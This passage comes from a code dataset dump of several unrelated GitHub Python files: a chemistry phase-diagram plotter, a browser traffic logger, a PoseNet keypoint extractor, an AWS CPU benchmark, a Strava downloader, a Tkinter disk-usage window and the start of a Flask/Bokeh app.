all u\n ref['u'][name] = ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T)\n ref['u'][name] += 8.314*T*ref['p'][name]/1000/96.4853 \n ref['u'][name] -= T*ref['S'][name](T) \n elif ('u' in keys) and len(keys)==1:\n uk = list(variable['u'].keys())\n uv = list(variable['u'].values())\n xlabel = 'u('+ uk[0] + ') (eV)'\n ylabel = 'u('+ uk[1] + ') (eV)'\n output = \"_\".join(['u',uk[0],'u',uk[1],'2D'])\n xdata = np.linspace(uv[0][0],uv[0][1],quality_2d[0])\n ydata = np.linspace(uv[1][0],uv[1][1],quality_2d[1])\n xgrid,ygrid = np.meshgrid(xdata,ydata)\n ref['u'][uk[0]] = xgrid.reshape(quality_2d[0]*quality_2d[1])\n ref['u'][uk[1]] = ygrid.reshape(quality_2d[0]*quality_2d[1])\n # recalculate u for new u\n T = ref['T']\n for name in uk: # not for all u\n ref['u'][name] += ref['E'][name]\n ref['u'][name] += ref['dZPE'][name]\n ref['u'][name] += ref['HT'][name](T) \n else:\n print(\"Unsupported 2D plot for: \"+str(keys))\n exit(0)\n # Get 2D data\n zgrid = []\n zgrid.append(np.zeros(xgrid.shape)) # all grid should compare to 0!\n elif nvar > 2:\n print(\"Number of variables must be 2 or fewer!\")\n exit(0)\n\n # eval dG\n dG = []\n for irow in range(len(data)):\n idata = data.iloc[irow]\n Nads = idata['Nads']\n iformula = idata['Formula']\n Total = idata['G_Total'] # for eval formula\n Slab = idata['G_Slab'] # for eval formula\n dG.append(eval(new_formula(ref,iformula,'u')))\n\n # output\n if nvar == 0:\n # This means p and T (or u) are single values, so no plot is made\n data['dG'] = dG\n 
data['dG_avg'] = data['dG']/data['Nads'] # average adsorption energy\n print('Save data to excel file G_result.xlsx')\n data = data[['Name','Nads','Formula','E_Slab','ZPE_Slab','E_Total','ZPE_Total','dG','dG_avg',]]\n data.to_excel('G_result.xlsx',float_format='%.4f',index=False)\n elif nvar == 1:\n ydata = {}\n for irow in range(len(data)):\n idata = data.iloc[irow]\n Nads = idata['Nads']\n name = idata['Name']\n ydata[name+'(N='+str(Nads)+')'] = dG[irow]\n plot_dict = {\n 'xdata':xdata,\n 'ydata': ydata,\n 'xlabel':xlabel,\n 'embed': embed,\n 'output':output,\n }\n plot_1D(plot_dict)\n elif nvar == 2:\n # get Gmin\n dG = np.array([[0]*(quality_2d[0]*quality_2d[1])]+dG)\n Gmin = dG.min(0) # column min\n ddG = dG - Gmin\n # calculate partition function\n if type(T) not in (np.ndarray,):\n if T==0:\n T = 298.15\n print(\"Use T=298.15 instead of 0!\")\n if not lprobability:\n T = 0.00000000001 # use very small T\n q = np.exp(-ddG*1000*96.4853/8.314/T) # note: T can be an array or a number\n # calculate probability\n P = q/q.sum(0)\n # get logical array\n LP = P >= p_threshold # states with probability above the threshold can exist\n LPset = list(set(map(tuple,LP.T))) # note: column mode\n # get index array\n Narray = np.ones(quality_2d[0]*quality_2d[1])*-1 # default value is -1\n for idx,iLP in enumerate(LPset):\n Narray[np.all(LP.T==iLP,1)] = idx\n # make it grid like \n ngrid = Narray.reshape(quality_2d)\n # get the labels\n label = {}\n label_id = np.unique(Narray).astype(np.intc)\n namelist = np.array([0]+list(data['Name']))\n nadslist = np.array([0]+list(data['Nads']))\n for idx in label_id:\n if idx != -1:\n iLP = LPset[idx]\n name = namelist[np.array(iLP)]\n nads = nadslist[np.array(iLP)]\n label_name = []\n if hasattr(name ,'__iter__'):\n for iname,inads in zip(name,nads):\n label_name.append(iname+'(N='+str(inads)+')')\n label_name = str(tuple(label_name))\n else:\n label_name = iname+'(N='+str(inads)+')'\n label[idx] = label_name \n else:\n label[idx] = None\n nmax,nmin = len(LPset),-1\n plot_dict = {\n 'ngrid':ngrid,\n 'xdata':xdata,\n 'ydata':ydata,\n 'xgrid':xgrid,\n 'ygrid':ygrid,\n 'nmin':nmin,\n 'nmax':nmax,\n 'xlabel':xlabel,\n 'ylabel':ylabel,\n 'output':output,\n 'embed':embed,\n 'label':label,\n }\n plot_2D(plot_dict)\n\n# close_veusz(embed,vdisplay)\n\nif __name__ == '__main__':\n # Constant\n quality_2d = (500,500) # the quality for 2D contour map\n import sys\n args = sys.argv\n lprobability = False\n p_threshold = 0.05\n filename = None\n if (len(args) < 2):\n print(\"usage: auto_phase_diagram.py xls_file [--probability threshold]\")\n exit(0)\n else:\n for idx,arg in enumerate(args):\n if arg == '--probability':\n try:\n p_threshold = float(args[idx+1])\n if p_threshold <= 0.0:\n print(\"Use default threshold 0.05.\")\n p_threshold = 0.05\n except:\n print(\"Use default threshold 0.05.\")\n pass\n lprobability = True\n elif '.xls' in arg:\n filename = arg\n \n if not filename:\n print(\"usage: auto_phase_diagram.py xls_file [--probability threshold]\")\n print(\".xls file should be provided!\")\n exit(0)\n phase_diagram(filename,quality_2d=quality_2d,lprobability=lprobability,p_threshold=p_threshold)", "repo_name": "renpj/auto_phase_diagram", "sub_path": "auto_phase_diagram.py", "file_name": "auto_phase_diagram.py", "file_ext": "py", "file_size_in_byte": 26520, "program_lang": 
"usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.interp", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.interp", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.interp", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 41, "usage_type": "attribute"}, {"api_name": "xvfbwrapper.Xvfb", "line_number": 57, "usage_type": "call"}, {"api_name": "veusz.embed.embed.Embedded", "line_number": 59, "usage_type": "call"}, {"api_name": "veusz.embed.embed", "line_number": 59, "usage_type": "attribute"}, {"api_name": "veusz.embed", "line_number": 59, "usage_type": "name"}, {"api_name": "pandas.read_excel", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 94, "usage_type": "call"}, {"api_name": "parser.expr", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.notnull", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.int64", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 177, "usage_type": "call"}, {"api_name": "parser.expr", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 219, "usage_type": "call"}, {"api_name": "pandas.notnull", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.int64", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 258, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 262, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 313, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 358, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 495, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 514, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 534, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 535, "usage_type": "call"}, 
{"api_name": "numpy.linspace", "line_number": 552, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 553, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 608, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 612, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 618, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 625, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 627, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 632, "usage_type": "call"}, {"api_name": "numpy.intc", "line_number": 632, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 633, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 634, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 639, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 673, "usage_type": "attribute"}]} +{"seq_id": "9353731248", "text": "from browsermobproxy import Server\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport time\r\n\r\nserver = Server(\"D:\\\\Program Files\\\\Python38\\\\works\\\\tools\\\\browsermob-proxy-2.1.4\\\\bin\\\\browsermob-proxy.bat\")\r\nserver.start()\r\nproxy = server.create_proxy()\r\n\r\nchrome_options = Options()\r\nchrome_options.add_argument('--proxy-server={0}'.format(proxy.proxy))\r\n\r\ndriver = webdriver.Chrome(chrome_options=chrome_options)\r\n# 要访问的地址\r\nbase_url = \"https://3a119.com/play/7696-1-1.html\"\r\nproxy.new_har(\"ht_list2\", options={'captureContent': True})\r\n\r\ndriver.get(base_url)\r\n# 此处最好暂停几秒等待页面加载完成,不然会拿不到结果\r\ntime.sleep(3)\r\nresult = proxy.har\r\n\r\nfor entry in result['log']['entries']:\r\n _url = entry['request']['url']\r\n print(_url)\r\n # # 根据URL找到数据接口,这里要找的是 http://git.liuyanlin.cn/get_ht_list 这个接口\r\n\r\n _response = entry['response']\r\n _content = _response['content']\r\n # 获取接口返回内容\r\n print(_response)\r\n\r\nserver.stop()\r\n", "repo_name": "liuxingmoon/tool", "sub_path": "network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 1076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "browsermobproxy.Server", "line_number": 6, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "73103012324", "text": "import tensorflow as tf\nimport cv2\nimport time\nimport argparse\nimport statistics\nimport sys\nimport posenet\nimport pandas as pd\nimport os\nimport re\n\n# CONSTANTS\nMIN_POSE_SCORE = 0.45\nMIN_KEYPOINT_SCORE = 0\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model', type=int, default=101)\nparser.add_argument('--cam_id', type=int, default=0)\nparser.add_argument('--cam_width', type=int, default=1280)\nparser.add_argument('--cam_height', type=int, default=720)\nparser.add_argument('--scale_factor', type=float, default=0.7125)\nparser.add_argument('--file', type=str, default=None, help=\"Optionally use a video 
file instead of a live camera\")\nparser.add_argument('--csv_loc', type=str, default=None, help=\"Location of the csv you want to create\")\nargs = parser.parse_args()\n\n\ndef main():\n with tf.Session() as sess:\n model_cfg, model_outputs = posenet.load_model(args.model, sess)\n output_stride = model_cfg['output_stride']\n\n training_data = \"../video_dataset/test\"\n training_videos = os.listdir(training_data)\n print(training_videos)\n\n for video in training_videos:\n exercise_type = re.split(\"\\d+.\", video)[0]\n cap = cv2.VideoCapture(\"{}/{}\".format(training_data, video))\n cap.set(3, args.cam_width)\n cap.set(4, args.cam_height)\n\n start = time.time()\n frame_count = 0\n rep_count = 0\n keypoints_detected = []\n people_detected = []\n all_keypoints_detected = []\n try:\n while True:\n # Read image\n input_image, display_image, output_scale = posenet.read_cap(\n cap, scale_factor=args.scale_factor, output_stride=output_stride)\n\n # Retrieve the heatmaps from the image\n heatmaps_result, offsets_result, displacement_fwd_result, displacement_bwd_result = sess.run(\n model_outputs,\n feed_dict={'image:0': input_image}\n )\n\n # Decode the heatmaps into poses and keypoints\n pose_scores, keypoint_scores, keypoint_coords = posenet.decode_multi.decode_multiple_poses(\n heatmaps_result.squeeze(axis=0),\n offsets_result.squeeze(axis=0),\n displacement_fwd_result.squeeze(axis=0),\n displacement_bwd_result.squeeze(axis=0),\n output_stride=output_stride,\n max_pose_detections=10,\n min_pose_score=MIN_POSE_SCORE)\n\n # Draw the poses onto the image\n keypoint_coords *= output_scale\n overlay_image, num_keypoints_detected, people_location, num_of_people_detected = posenet.draw_skel_and_kp(\n display_image, pose_scores, keypoint_scores, keypoint_coords,\n min_pose_score=MIN_POSE_SCORE, min_part_score=MIN_KEYPOINT_SCORE)\n\n # Store data needed to print final summaries\n frame_count += 1\n keypoints_detected.append(num_keypoints_detected)\n people_detected.append(num_of_people_detected)\n\n for i in people_location:\n all_keypoints_detected.append([i, exercise_type])\n\n cv2.putText(overlay_image, 'Rep count: {}'.format(rep_count), (53, 500), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.imshow('', overlay_image)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n except:\n print(\"Average number of key-points detected throughout the video: {}\".format(statistics.mean(keypoints_detected)))\n missing_keypoints = len([i for i in keypoints_detected if i < 17])\n extra_keypoints = len([i for i in keypoints_detected if i > 17])\n print(\"{} of the {} frames are missing atleast one keypoint\".format(missing_keypoints,\n len(keypoints_detected)))\n print(\"{} of the {} frames have atleast one extra keypoint\".format(extra_keypoints,\n len(keypoints_detected)))\n print(\"There were at most {} person(s) detected in this video\".format(max(people_detected)))\n\n print('Average FPS: ', frame_count / (time.time() - start))\n\n if max(people_detected) > 1:\n continue\n # Create the pandas DataFrame\n df = pd.DataFrame(all_keypoints_detected, columns=['keypoints', 'label'])\n # Write all of the keypoints into a csv\n # if file does not exist write header\n print(\"Writing to file\")\n if not os.path.isfile(args.csv_loc):\n df.to_csv(args.csv_loc, header=['keypoints', 'label'], index=False)\n else: # else it exists so append without writing the header\n df.to_csv(args.csv_loc, mode='a', header=False, index=False)\n\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": 
"JamesPeralta/WorkoutRecognitionThesis", "sub_path": "posenet-tf/extract_keypoints.py", "file_name": "extract_keypoints.py", "file_ext": "py", "file_size_in_byte": 5287, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 28, "usage_type": "call"}, {"api_name": "posenet.load_model", "line_number": 29, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 33, "usage_type": "call"}, {"api_name": "re.split", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "posenet.read_cap", "line_number": 51, "usage_type": "call"}, {"api_name": "posenet.decode_multi.decode_multiple_poses", "line_number": 61, "usage_type": "call"}, {"api_name": "posenet.decode_multi", "line_number": 61, "usage_type": "attribute"}, {"api_name": "posenet.draw_skel_and_kp", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 84, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 84, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 87, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}]} +{"seq_id": "34191378096", "text": "import threading\nimport requests\nimport time\nimport datetime\nimport random\nimport os\nimport boto3\nimport boto3.session\nfrom botocore.exceptions import ClientError\nimport measurehelper as mh\n\ndef measure_cpu_utilization(ec2_client, ec2_resource, cw_client, instance_id):\n instance = ec2_resource.Instance(instance_id)\n\n instance.start()\n instance.wait_until_running()\n\n start_time = datetime.datetime.utcnow().replace(microsecond=0, second=0)\n end_time = datetime.timedelta(minutes=15) + start_time\n instance.monitor()\n time.sleep(900)\n\n response = cw_client.get_metric_statistics(Namespace='AWS/EC2', MetricName='CPUUtilization', Dimensions=[\n {'Name': 'InstanceId', 'Value': instance_id}], StartTime=start_time, EndTime=end_time, Period=60, Statistics=['Average', 'Minimum', 'Maximum'])\n print(response)\n\n instance.stop()\n instance.wait_until_stopped()\n return\n\n\nec2_client_t1 = boto3.session.Session().client('ec2')\nec2_client_t2 = boto3.session.Session().client('ec2')\nec2_resource_t1 = boto3.session.Session().resource('ec2')\nec2_resource_t2 = boto3.session.Session().resource('ec2')\ncw_client_t1 = boto3.session.Session().client('cloudwatch')\ncw_client_t2 = boto3.session.Session().client('cloudwatch')\n\n\ndef benchmark_linux(ec2_client, ec2_resource, cw_client):\n results_path = '/usr/src/results'\n linux_instance_id, control_linux_instance_id = mh.retrieve_linux_instances_ids(ec2_client, ec2_resource)\n measure_cpu_utilization(ec2_client, ec2_resource, cw_client, linux_instance_id)\n\n return\n\n\ndef benchmark_osv(ec2_client, ec2_resource, cw_client):\n results_path = 
'/usr/src/results'\n osv_instance_id, control_osv_instance_id = mh.retrieve_osv_instances_ids(ec2_client, ec2_resource)\n measure_cpu_utilization(ec2_client, ec2_resource, cw_client, osv_instance_id)\n\n return\n\n\ntry:\n t1 = threading.Thread(target=benchmark_linux, args=(ec2_client_t1, ec2_resource_t1, cw_client_t1))\n t2 = threading.Thread(target=benchmark_osv, args=(ec2_client_t2, ec2_resource_t2, cw_client_t2))\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n\nexcept ClientError as e:\n print(e)\n exit(1)\n", "repo_name": "steffbue/unikernel-benchmark", "sub_path": "src/scripts/measure-cpu-util.py", "file_name": "measure-cpu-util.py", "file_ext": "py", "file_size_in_byte": 2209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "boto3.session.Session", "line_number": 32, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 32, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 33, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 33, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 34, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 34, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 35, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 35, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 36, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 36, "usage_type": "attribute"}, {"api_name": "boto3.session.Session", "line_number": 37, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 37, "usage_type": "attribute"}, {"api_name": "measurehelper.retrieve_linux_instances_ids", "line_number": 42, "usage_type": "call"}, {"api_name": "measurehelper.retrieve_osv_instances_ids", "line_number": 50, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 57, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 58, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "17839599688", "text": "import argparse\nimport requests as re\nimport ujson\n\nfrom datetime import datetime\n\nparser = argparse.ArgumentParser(description='get activity data')\nparser.add_argument('--token', help='access token for the request')\n\nif __name__==\"__main__\":\n args = parser.parse_args()\n token = args.token\n\n headers = {\n 'accept': \"application/json\",\n 'authorization': f\"Bearer {token}\",\n 'content-type': \"application/json\",\n }\n url = \"https://www.strava.com/api/v3/athlete/activities\"\n\n results = re.get(url=url, headers=headers)\n\n if results.status_code == 200:\n\n current_time = datetime.today().strftime('%Y%m%d%H%M')\n with open(f'data/activities_{current_time}.json', 'w') as jsonfile:\n ujson.dump(results.json(), jsonfile)", "repo_name": "alwalms/strava-api", "sub_path": "scripts/get_activity_data.py", "file_name": "get_activity_data.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
"github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "name"}, {"api_name": "ujson.dump", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "5723928553", "text": "import shutil\nimport os\nfrom tkinter import *\n\nimport utils\n\n\nclass Disks:\n def drawDiskWindow(self):\n # Functions\n if True:\n def getFiles(folder):\n files, folders = [], []\n for f in os.listdir(folder):\n if os.path.isfile(folder + \"/\" + f):\n files.append(f)\n else:\n if f != \"Torrents\":\n folders.append(f)\n a, b = getFiles(folder + \"/\" + f)\n files += a\n folders += b\n return files, folders\n\n def size_format(size):\n units = (\"b\", \"Kb\", \"Mb\", \"Gb\", \"Tb\")\n u = 0\n while u < len(units) - 1:\n if size >= 1000:\n size = size // 1000\n u += 1\n else:\n break\n return f'{size:,}' + \" \" + units[u]\n\n def exit(e=None):\n self.diskWindow.destroy()\n\n # Window init - Fancy corners - Events\n if True:\n disk = self.animePath.split(\"/\")[0]\n if self.diskWindow is None or not self.diskWindow.winfo_exists():\n size = (self.diskWindowMinWidth, self.diskWindowMinHeight)\n self.diskWindow = utils.RoundTopLevel(\n self.initWindow,\n title=\"Disk \" + disk,\n minsize=size,\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4'])\n else:\n self.diskWindow.clear()\n self.diskWindow.focus()\n\n # Bars\n if True:\n barFrame = Frame(self.diskWindow, bg=self.colors['Gray2'])\n length = 500\n radius = 25\n usageColors = {75: 'Green', 90: 'Orange', 100: 'Red'}\n total, used, free = shutil.disk_usage(disk)\n usedSize = length * used / total\n usedPrct = used / total * 100\n for p, c in list(usageColors.items())[::-1]:\n if usedPrct <= p:\n color = c\n\n # self.diskWindow.titleLbl.configure(text=\"Disk \"+disk, font=(\"Source Code Pro Medium\",20),\n # bg= self.colors['Gray2'], fg= self.colors['Gray4'],)\n\n bar = Canvas(\n barFrame,\n bg=self.colors['Gray2'],\n width=length,\n height=radius * 2,\n highlightthickness=0,\n )\n bar.create_line(\n radius,\n radius,\n length - radius,\n radius,\n capstyle='round',\n fill=self.colors['Gray4'],\n width=radius)\n bar.create_line(\n radius,\n radius,\n usedSize - radius,\n radius,\n capstyle='round',\n fill=self.colors[color],\n width=radius)\n bar.grid(row=1, column=0, columnspan=3)\n Label(\n barFrame,\n text=\"%d GB used\" % (used // (2**30)),\n wraplength=900,\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=2, column=0)\n Label(\n barFrame,\n text=\"%d GB total\" % (total // (2**30)),\n wraplength=900,\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=2, column=1)\n Label(\n barFrame,\n text=\"%d GB free\" % (free // (2**30)),\n wraplength=900,\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=2, column=2)\n barFrame.grid_columnconfigure(1, weight=1)\n barFrame.pack(pady=20)\n\n # Size info\n if True:\n cache_size = sum(os.path.getsize(os.path.join(self.cache, f)) for f in os.listdir(self.cache))\n db_size = os.path.getsize(self.dbPath)\n\n sizeFrame = Frame(self.diskWindow, bg=self.colors['Gray2'])\n Label(\n sizeFrame,\n text=\"Cache size:\",\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n 
fg=self.colors['Gray4']\n ).grid(row=0, column=0)\n Label(\n sizeFrame,\n text=size_format(cache_size),\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=0, column=1)\n\n Label(\n sizeFrame,\n text=\"Database size:\",\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=1, column=0)\n Label(\n sizeFrame,\n text=size_format(db_size),\n font=(\"Source Code Pro Medium\", 12),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']\n ).grid(row=1, column=1)\n [sizeFrame.grid_columnconfigure(i, weight=1) for i in range(2)]\n sizeFrame.pack(pady=20)\n\n # Stats info\n if True:\n fileFrame = Frame(self.diskWindow, bg=self.colors['Gray2'])\n t = Label(\n fileFrame,\n text=\"Animes folder:\",\n wraplength=900,\n font=(\n \"Source Code Pro Medium\",\n 20),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4'])\n t.grid(row=0, column=0, columnspan=2)\n files, folders = getFiles(self.animePath)\n Label(\n fileFrame,\n text=\"%d files - %d folders\" %\n (len(files),\n len(folders)),\n wraplength=900,\n font=(\n \"Source Code Pro Medium\",\n 15),\n bg=self.colors['Gray2'],\n fg=self.colors['Gray4']).grid(\n row=1,\n column=0,\n sticky=\"nsew\")\n # [fileFrame.grid_columnconfigure(i,weight=1) for i in range(2)]\n fileFrame.pack(pady=20)\n", "repo_name": "WiredMind2/AnimeManager", "sub_path": "windows/disks.py", "file_name": "disks.py", "file_ext": "py", "file_size_in_byte": 6612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "utils.RoundTopLevel", "line_number": 44, "usage_type": "call"}, {"api_name": "shutil.disk_usage", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 123, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}]} +{"seq_id": "1329942755", "text": "from flask import Flask, render_template, request, redirect, jsonify\nimport pandas as pd\nimport numpy as np\nfrom bokeh.models import PrintfTickFormatter, LinearAxis, Range1d\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh import embed\nfrom bokeh.models import (\n GMapPlot, GMapOptions, ColumnDataSource, Circle, Range1d, PanTool, WheelZoomTool, BoxSelectTool\n)\n\n\n\napp = Flask(__name__)\n\n# Load the dataset\ndf_info=pd.read_csv('df_info.csv')\ndf_map=pd.read_csv('df_map.csv')\nus_state_abbrev = {\n 'ALABAMA': 'AL',\n 'ALASKA': 'AK',\n 'ARIZONA': 'AZ',\n 'ARKANSAS': 'AR',\n 'CALIFORNIA': 'CA',\n 'COLORADO': 'CO',\n 'CONNECTICUT': 'CT',\n 'DELAWARE': 'DE',\n 'FLORIDA': 'FL',\n 'GEORGIA': 'GA',\n 'HAWAII': 'HI',\n 'IDAHO': 'ID',\n 'ILLINOIS': 'IL',\n 'INDIANA': 'IN',\n 'IOWA': 'IA',\n 'KANSAS': 'KS',\n 'KENTUCKY': 'KY',\n 'LOUISIANA': 'LA',\n 'MAINE': 'ME',\n 'MARYLAND': 'MD',\n 'MASSACHUSETTS': 'MA',\n 'MICHIGAN': 'MI',\n 'MINNESOTA': 'MN',\n 'MISSISSIPPI': 'MS',\n 'MISSOURI': 'MO',\n 'MONTANA': 'MT',\n 'NEBRASKA': 'NE',\n 'NEVADA': 'NV',\n 'NEW HAMPSHIRE': 
